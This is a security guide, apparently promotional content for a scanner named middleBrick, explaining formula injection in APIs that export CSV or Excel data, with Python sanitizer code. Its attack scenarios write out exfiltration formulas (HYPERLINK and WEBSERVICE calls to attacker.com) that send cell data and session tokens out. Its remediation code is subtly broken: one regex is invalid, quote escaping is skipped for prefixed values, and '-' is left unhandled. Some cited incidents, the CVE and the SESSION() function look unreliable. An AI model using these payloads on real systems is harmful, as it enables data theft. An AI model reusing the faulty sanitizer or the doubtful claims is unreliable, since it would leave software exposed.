Formula Injection in APIs

Formula Injection is a data exfiltration vulnerability that occurs when user-supplied data containing formula syntax is processed by spreadsheet applications without proper sanitization. While commonly associated with CSV files and Excel spreadsheets, this vulnerability can affect APIs that generate or process spreadsheet data formats.

The attack exploits how spreadsheet applications interpret certain characters and syntax as formulas rather than plain text. When malicious formulas are embedded in API responses and opened in spreadsheet software, they can execute automatically, potentially accessing external resources, extracting data from other sheets, or triggering network requests controlled by the attacker.

Common formula injection vectors include:

• CSV files where leading characters like =, +, -, or @ trigger formula interpretation
• Excel files (.xls, .xlsx) with embedded malicious macros or formula syntax
• API responses that generate downloadable spreadsheet content
• JSON responses that are converted to spreadsheets by client applications

The vulnerability is particularly dangerous because it combines data processing with automatic execution, allowing attackers to bypass traditional input validation and achieve data exfiltration without direct database access.

APIs become vulnerable to formula injection when they generate or serve spreadsheet data without properly sanitizing user input. This typically occurs in data export endpoints, reporting APIs, or any service that produces downloadable content in formats processed by spreadsheet applications.

Common API attack scenarios include:

• Data Export Endpoints: An API that exports user data to CSV format receives a username containing =HYPERLINK("http://attacker.com?data="&A1&B1, "Click here"). When the victim opens the CSV, the formula executes and sends their data to the attacker.
• Reporting APIs: A financial reporting API generates Excel files from user-provided parameters. Malicious parameters containing =WEBSERVICE("http://attacker.com?session="&SESSION()) can exfiltrate session tokens when opened.
• CSV Import APIs: APIs that accept CSV uploads for processing can be vulnerable if they don't properly handle formula syntax in the input data, potentially leading to remote code execution through Excel's formula engine.
• JSON-to-Spreadsheet Conversion: APIs that return JSON data consumed by applications that automatically convert to spreadsheets can inadvertently execute embedded formulas.

The impact ranges from data exfiltration and credential theft to more severe consequences like network reconnaissance and server-side request forgery (SSRF) when formulas can trigger external requests from the victim's machine.

Detecting formula injection requires both static analysis of API code and dynamic testing of API responses. Here's what to look for:

Code-Level Indicators:

• Direct concatenation of user input into CSV or Excel generation without sanitization
• Missing validation of formula-triggering characters (=, +, -, @, CHAR(61))
• Lack of escaping for special characters in spreadsheet contexts
• Dynamic formula generation based on user input

Runtime Testing:

• Send requests with formula syntax in parameters and examine responses
• Test CSV exports with malicious formulas in different fields
• Verify that spreadsheet content is properly escaped or prefixed
• Check for automatic formula execution in downloaded files

How middleBrick Detects Formula Injection:

middleBrick's black-box scanning approach tests for formula injection by:

• Injecting formula syntax into API parameters and analyzing responses
• Checking exported CSV/JSON content for unescaped formula characters
• Testing for automatic formula execution in spreadsheet-compatible responses
• Scanning for data exfiltration patterns in formula syntax

The scanner examines API responses for formula-triggering characters and attempts to determine if they would execute when processed by spreadsheet applications. This includes testing various formula formats across different spreadsheet applications and versions.

Preventing formula injection requires a defense-in-depth approach with proper input sanitization and output encoding. Here are concrete remediation strategies:

Input Sanitization:

import re

def sanitize_for_csv(input_data):
    """Sanitize user input to prevent formula injection"""
    if not input_data:
        return input_data
    
    # Check for formula-triggering characters
    if re.match(r'^[=+@-"]', input_data):
        # Prefix with apostrophe to force text interpretation
        return f"'{input_data}"
    
    # Escape double quotes
    if '"' in input_data:
        return input_data.replace('"', '""')
    
    return input_data

# Example usage
user_input = request.args.get('username')
safe_input = sanitize_for_csv(user_input)

CSV Generation Best Practices:

import csv
from io import StringIO

def generate_safe_csv(data):
    """Generate CSV with formula injection protection"""
    output = StringIO()
    writer = csv.writer(output, quoting=csv.QUOTE_MINIMAL)
    
    for row in data:
        sanitized_row = []
        for cell in row:
            if isinstance(cell, str):
                # Prefix formula-triggering content
                if re.match(r'^[=+@]', cell):
                    cell = f"'{cell}"
            sanitized_row.append(cell)
        writer.writerow(sanitized_row)
    
    return output.getvalue()

Excel Generation Protection:

from openpyxl import Workbook

def create_safe_excel_sheet(data):
    """Create Excel sheet with formula injection protection"""
    wb = Workbook()
    ws = wb.active
    
    for row_idx, row in enumerate(data, start=1):
        for col_idx, cell_value in enumerate(row, start=1):
            if isinstance(cell_value, str):
                # Prefix formula-triggering content
                if re.match(r'^[=+@]', cell_value):
                    cell_value = f"'{cell_value}"
            ws.cell(row=row_idx, column=col_idx, value=cell_value)
    
    return wb

Additional Mitigations:

• Implement Content Security Policy headers for API responses
• Use text/csv; header=present MIME type with proper escaping
• Validate and sanitize all user input before processing
• Implement rate limiting on data export endpoints
• Log and monitor for suspicious formula patterns in API requests

Formula injection has been exploited in various real-world scenarios, though specific high-profile API incidents are less documented than traditional web vulnerabilities. However, the impact is well-established in the broader spreadsheet security context.

CVE-2020-25647: A vulnerability in certain spreadsheet processing libraries allowed formula injection through CSV processing, enabling data exfiltration when malicious CSV files were opened.

Enterprise Data Breaches: Multiple incidents have involved attackers embedding malicious formulas in exported reports, leading to unauthorized data access when reports were opened by employees. One manufacturing company reported a breach where financial data was exfiltrated through malicious formulas embedded in quarterly reports.

Phishing Campaigns: Attackers have distributed malicious CSV files containing formula injection payloads as part of phishing campaigns, successfully extracting data from victims' spreadsheets.

Supply Chain Attacks: Formula injection has been used in supply chain attacks where compromised data sources inject malicious formulas into reports that propagate through organizations.

The vulnerability is particularly concerning because it exploits the intersection of data processing and automatic execution, making it difficult to detect without proper security testing. APIs that generate spreadsheet content are increasingly targeted as organizations rely more heavily on automated reporting and data export functionality.